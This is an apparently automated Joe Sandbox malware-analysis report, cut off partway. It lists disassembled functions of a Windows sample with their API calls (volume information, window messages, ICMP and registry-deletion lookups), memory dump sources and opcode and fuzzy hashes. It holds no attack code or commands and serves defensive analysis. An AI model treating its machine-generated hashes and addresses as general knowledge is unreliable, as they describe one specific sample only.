                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                        Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                        Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                        Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                        • String ID: crts
                                                                        • API String ID: 943502515-3724388283
                                                                        • Opcode ID: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                        • Opcode Fuzzy Hash: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                        Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$LabelVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2006950084-234962358
                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                        Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                        • DrawMenuBar.USER32 ref: 00449761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                                        • String ID: 0
                                                                        • API String ID: 772068139-4108050209
                                                                        • Opcode ID: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                        • Opcode Fuzzy Hash: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                        Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcscpy
                                                                        • String ID: 3, 3, 8, 1
                                                                        • API String ID: 3469035223-357260408
                                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                        Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                                        • API String ID: 2574300362-3530519716
                                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                        Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                                        • API String ID: 2574300362-275556492
                                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                        Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                                        • API String ID: 2574300362-58917771
                                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                        Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                        Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                        • __itow.LIBCMT ref: 004699CD
                                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                        • __itow.LIBCMT ref: 00469A97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                        Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                        Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 2782032738-0
                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                        Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
